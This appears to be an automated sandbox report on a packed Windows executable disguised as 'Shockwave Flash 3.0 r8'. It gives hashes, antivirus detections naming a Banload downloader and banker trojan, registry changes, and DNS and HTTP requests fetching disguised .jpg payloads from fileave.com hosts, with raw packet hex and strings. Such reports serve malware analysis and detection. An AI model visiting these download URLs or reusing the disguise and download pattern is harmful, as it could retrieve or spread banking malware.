Analysis Date2015-01-25 20:19:45
MD583b82974fc1734eb3d384553206d59fc
SHA1fa0b8b522abc3c323349c01fbf5131a318edd566

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: e8515e441d0c0468931059eaf697cd80 sha1: 3312f807ba6ec58172c417406004eedc3026e56c size: 18432
Section.rsrc md5: 53092036ad76b2be491d0027a0c3b038 sha1: 44929669dc4e6dd41e076144fbaec42ef01fc889 size: 9728
Section.ccp3p md5: 6bdabac418f7fdc333cd8efedc5c6f3e sha1: 56eb57821e1dbcb93c1fbe67729579e3f47a0b40 size: 1024
Timestamp1992-06-19 22:22:17
VersionLegalCopyright: Shockwave Flash 3.0 r8
InternalName: Shockwave Flash 3.0 r8
FileVersion: 1.0.0.0
CompanyName: Shockwave Flash 3.0 r8
SpecialBuild:
LegalTrademarks: Shockwave Flash 3.0 r8
Comments: Shockwave Flash 3.0 r8
ProductName: Shockwave Flash 3.0 r8
ProductVersion: 1.0.0.0
FileDescription: Shockwave Flash 3.0 r8
OriginalFilename: Shockwave Flash 3.0 r8
PackerCRYPToCRACk's PE Protector V0.9.2 -> Lukas Fleischer
PEhasha3590f41b7995ce34455604dc0e5a5c1164bc02a
IMPhasheee9062b8cbe1efb89c250150605b1a4
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.bm1@rPVsOImG
AVAlwil (avast)Crypt-DDI [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.bm1@rPVsOImG
AVAuthentiumW32/Downloader.CDKC-5666
AVAvira (antivir)TR/Spy.Banker.Gen
AVBullGuardGen:Trojan.Heur.bm1@rPVsOImG
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanDownloader.Banload.r3
AVClamAVTrojan.Crypted-10
AVDr. WebTrojan.DownLoader.20028
AVEmsisoftGen:Trojan.Heur.bm1@rPVsOImG
AVEset (nod32)no_virus
AVFortinetW32/Banload.OIS!tr.dldr
AVFrisk (f-prot)W32/Downldr2.DOG
AVF-SecureGen:Trojan.Heur.bm1@rPVsOImG
AVGrisoft (avg)Packed.CryptoCrack
AVIkarusTrojan-Spy.Win32.Banker.anv
AVK7Trojan-Downloader ( 00368fc61 )
AVKasperskyTrojan-Downloader.Win32.Banload.ois
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Small.gen!AO
AVMicroWorld (escan)Gen:Trojan.Heur.bm1@rPVsOImG
AVRisingTrojan.DL.Win32.Undef.qef
AVSophosMal/Behav-103
AVSymantecPacked.Generic.48
AVTrend MicroTROJ_DELF.YX
AVVirusBlokAda (vba32)Trojan-Downloader.Win32.Small.102210

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\\arquivos de programas\internet explorer\iexplore.exe http://paularmstrongdesigns.com/photos/photos/rave.jpg
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSatoalisa2.fileave.com
Winsock DNSatoalisa3.fileave.com
Winsock DNSatoalisa1.fileave.com

Process
↳ C:\\arquivos de programas\internet explorer\iexplore.exe http://paularmstrongdesigns.com/photos/photos/rave.jpg

Network Details:

DNSatoalisa3.fileave.com
Type: A
208.73.211.167
DNSatoalisa3.fileave.com
Type: A
208.73.211.244
DNSatoalisa3.fileave.com
Type: A
208.73.211.250
DNSatoalisa3.fileave.com
Type: A
208.73.210.211
DNSatoalisa2.fileave.com
Type: A
208.73.211.199
DNSatoalisa2.fileave.com
Type: A
208.73.210.204
DNSatoalisa2.fileave.com
Type: A
208.73.210.210
DNSatoalisa2.fileave.com
Type: A
208.73.211.179
DNSatoalisa1.fileave.com
Type: A
208.73.211.167
DNSatoalisa1.fileave.com
Type: A
208.73.211.244
DNSatoalisa1.fileave.com
Type: A
208.73.211.250
DNSatoalisa1.fileave.com
Type: A
208.73.210.211
HTTP GEThttp://atoalisa3.fileave.com/modelo3.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://atoalisa2.fileave.com/modelo2.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://atoalisa1.fileave.com/modelo1.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.199:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.167:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d6f64 656c6f33 2e6a7067   GET /modelo3.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736133   .Host: atoalisa3
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d6f64 656c6f32 2e6a7067   GET /modelo2.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736132   .Host: atoalisa2
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d6f64 656c6f31 2e6a7067   GET /modelo1.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736131   .Host: atoalisa1
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....


Strings
..O
H
.

041604E4
1.0.0.0
1s%P
bsJP2
Comments
CompanyName
DVCLAL
FileDescription
FileVersion
InternalName
Js2P
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
ProductName
ProductVersion
Shockwave Flash 3.0 r8
SpecialBuild
ssPP
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
           
,########"""""
"$$$$$$$$$##
((((''%%%$$%%%%%'(
((((((('%%%%%%%%''(
$%%$$$$$$$$
$%%%$$$$$$
$%%%%$$$$$
######
%$$$$%%$$
															
																								
1"rFdd
3	O&75
"3 :^{S,
))44(((''''%%%%'''(
)_4rQs
5TscjikN
6T	fhx
9Kl9I)
9x%nCgp
a"Ds-fZ
advapi32.dll
and?p=Opx
*AS\~^S
.ccp3p
?.ccpt/
%DS<L`
D	tT!]
eC{]f+
?.edatG
EJ(UbQ
?ExitP
FatalExit
F+DLqs
ffqt7}
#G<qWd
hALY|u
^#H\bO!
(jHB	&q_
-/{:}k-6G}
kernel32.dll
+K&j@BdQ
	ljpW(
lQX+}|=
ly>fO>
msvb]f
%	N%N#j
oleaut32.dll
 oLSUK@{
p,7 T~
Q1NF95L
"#"``qFm
([Q"	h
qs;q~M
?rsrct7
?.rsrt?
SKE5MN
This program must be run under Win32
tiiiiuv
tttt															t
ttttttt											t
tttttttttttttt
/&tV/;LT
Ubs=D^*
URLMON.DLL
user32.dll
USQWVR
*	W''cK
w_PEAq5x
yr66!]
Z)#aNT
|Zie[gL
Z^_Y[]